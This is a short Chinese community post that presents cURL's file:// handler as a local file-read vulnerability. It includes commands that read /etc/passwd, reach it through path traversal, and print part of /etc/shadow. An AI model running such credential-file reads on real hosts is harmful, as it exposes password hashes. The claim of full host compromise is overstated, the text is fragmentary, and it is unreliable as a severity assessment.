
cURL默认启用的file://协议处理程序允许访问系统本地文件。攻击者通过执行特定cURL命令,可利用文件路径指定或目录遍历技术读取主机上的任意文件。
./configure --with-ssl && make)./src/curl "file:///etc/passwd"读取passwd文件内容./src/curl "file:///tmp/../../etc/passwd"演示通过路径遍历访问相同文件./src/curl -s "file:///etc/shadow" | head -c20读取shadow文件的部分敏感数据能执行cURL命令的攻击者可读取运行用户权限范围内的所有本地文件,包括:
该漏洞将危及系统保密性,最终可能导致受影响主机的完全控制。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。